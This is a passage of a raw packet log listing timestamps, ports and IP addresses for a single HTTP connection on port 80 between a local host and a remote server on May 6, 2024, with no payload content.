May 6, 2024 07:53:11.240410089 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:11.240422964 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:11.240436077 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:11.240463018 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:11.240470886 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:11.240483046 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:11.240495920 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:11.240499020 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:11.240518093 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:11.240530014 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:11.240576029 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:11.240770102 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:11.507989883 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:11.508008003 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:11.508018017 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:11.508044004 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:11.508054972 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:11.508066893 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:11.508078098 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:11.508080006 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:11.508124113 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:11.508128881 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:11.508136988 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:11.508147955 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:11.508160114 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:11.508172035 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:11.508188009 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:11.508214951 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:11.508217096 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:11.508229971 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:11.508240938 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:11.508254051 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:11.508255959 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:11.508266926 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:11.508269072 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:11.508280039 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:11.508289099 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:11.508295059 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:11.508311987 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:11.508316994 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:11.508336067 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:11.508358955 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:11.508362055 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:11.510727882 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:11.775646925 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:11.775665045 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:11.775676012 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:11.775687933 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:11.775701046 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:11.775722980 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:11.775760889 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:11.775765896 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:11.775804043 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:11.775827885 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:11.775840044 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:11.775851011 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:11.775862932 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:11.775866032 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:11.775875092 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:11.775878906 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:11.775888920 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:11.775891066 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:11.775903940 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:11.775911093 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:11.775917053 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:11.775934935 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:11.775957108 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:11.775959969 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:11.775970936 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:11.775983095 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:11.775995016 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:11.775998116 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:11.776010990 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:11.776021004 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:11.776035070 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:11.776041985 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:11.776048899 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:11.776062012 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:11.776073933 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:11.776074886 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:11.776089907 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:11.776092052 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:11.776107073 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:11.776127100 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:11.776148081 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:11.776153088 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:11.776171923 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:11.776185036 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:11.776191950 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:11.776199102 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:11.776205063 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:11.776211977 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:11.776221037 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:11.776225090 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:11.776233912 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:11.776237965 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:11.776247978 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:11.776252031 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:11.776259899 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:11.776266098 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:11.776298046 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:11.776299953 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:11.776313066 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:11.776319027 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:11.776326895 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:11.776339054 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:11.776340008 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:11.776346922 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:11.776354074 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:11.776364088 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:11.776376009 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:11.776392937 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:11.778218031 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:11.778230906 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:11.778284073 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:12.043355942 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.043370008 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.043399096 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.043411970 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.043411970 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:12.043428898 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:12.043445110 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:12.043489933 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.043504953 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.043514967 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.043526888 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:12.043528080 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.043549061 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:12.043580055 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:12.043591022 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.043629885 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:12.043657064 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.043692112 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.043695927 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:12.043705940 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.043723106 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:12.043745041 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:12.043756008 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.043767929 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.043776989 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.043788910 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.043796062 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:12.043802977 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:12.043806076 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.043818951 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.043822050 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:12.043832064 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:12.043833017 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.043847084 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.043859005 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:12.043859959 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.043883085 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:12.043905020 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:12.043931007 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.043943882 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.043953896 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.043966055 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.043971062 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:12.043977976 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:12.043979883 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.043992996 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.043998957 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:12.044006109 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.044018984 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.044020891 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:12.044034004 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.044044971 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:12.044045925 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.044059992 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:12.044079065 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:12.044142962 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.044154882 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.044166088 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.044184923 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:12.044193983 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:12.044203997 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:12.044220924 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.044234037 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.044258118 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:12.044266939 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:12.044318914 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.044329882 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.044341087 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.044352055 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.044354916 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:12.044362068 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:12.044369936 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.044382095 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:12.044384003 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.044397116 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.044399023 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:12.044409990 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:12.044410944 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.044429064 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:12.044435024 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:12.044445992 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.044452906 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:12.044459105 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.044481039 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.044481993 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:12.044492960 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.044496059 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:12.044517994 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:12.044526100 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:12.044553995 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.044567108 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.044578075 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.044589043 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.044593096 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:12.044599056 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:12.044603109 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.044615984 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.044620991 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:12.044630051 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:12.044630051 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.044644117 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:12.044670105 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:12.044682026 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:12.044682980 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.044698000 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.044720888 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.044723988 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:12.044729948 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:12.044734001 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.044744968 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.044756889 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:12.044758081 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.044770002 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.044771910 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:12.044780970 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:12.044783115 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.044795990 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.044797897 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:12.044807911 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.044811010 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:12.044821024 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.044826984 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:12.044832945 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.044846058 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.044847965 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:12.044863939 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.044876099 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:12.044878960 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.044892073 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.044898033 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:12.044903994 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.044914961 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.044919968 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:12.044928074 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.044940948 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.044945002 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:12.044953108 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:12.044953108 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.044981956 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:12.045001984 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:12.046437025 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.046475887 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:12.046484947 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.046525955 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:12.046547890 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.046571970 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.046578884 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:12.046607971 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:12.311011076 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.311024904 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.311036110 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.311048031 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.311060905 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.311068058 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:12.311086893 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:12.311089993 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.311105967 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.311117887 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:12.311147928 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:12.311171055 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.311183929 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.311194897 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.311207056 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.311211109 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:12.311220884 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.311232090 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.311233044 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:12.311254025 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:12.311269999 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:12.311288118 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.311300039 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.311311007 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.311321020 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.311326981 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:12.311336040 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.311348915 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.311350107 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:12.311363935 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.311374903 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:12.311377048 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.311392069 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:12.311393976 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.311405897 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.311418056 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:12.311431885 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.311444044 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.311446905 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:12.311470985 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:12.311491013 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:12.311511993 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.311525106 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.311536074 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.311547995 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:12.311553955 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.311559916 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:12.311566114 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.311578035 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:12.311578035 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.311587095 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:12.311592102 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.311603069 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.311605930 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:12.311616898 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.311619043 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:12.311631918 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:12.311641932 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.311649084 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:12.311655045 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:12.311656952 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.311678886 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:12.311691046 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:12.311749935 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.311764002 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.311784029 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:12.311801910 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:12.311842918 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.311857939 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.311870098 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.311881065 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:12.311882973 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.311894894 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.311907053 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.311922073 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.311923027 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:12.311934948 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.311935902 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:12.311948061 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.311961889 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:12.311971903 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.311973095 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:12.311985016 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.311996937 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:12.312005997 CEST	49743	80	192.168.2.4	193.233.132.253
